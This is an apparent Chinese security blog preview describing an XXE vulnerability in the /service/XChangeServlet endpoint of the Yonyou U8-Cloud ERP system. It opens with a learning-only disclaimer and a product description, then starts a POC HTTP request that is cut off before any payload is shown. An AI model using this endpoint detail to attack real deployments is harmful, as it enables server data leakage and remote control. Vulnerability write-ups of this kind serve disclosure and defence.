【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 用友U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统/service/XChangeServlet接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。 0x02影响版本 用友-U8-Cloud 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC （POST） 漏洞复现 POST /service/XChangeServlet HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ ………………………………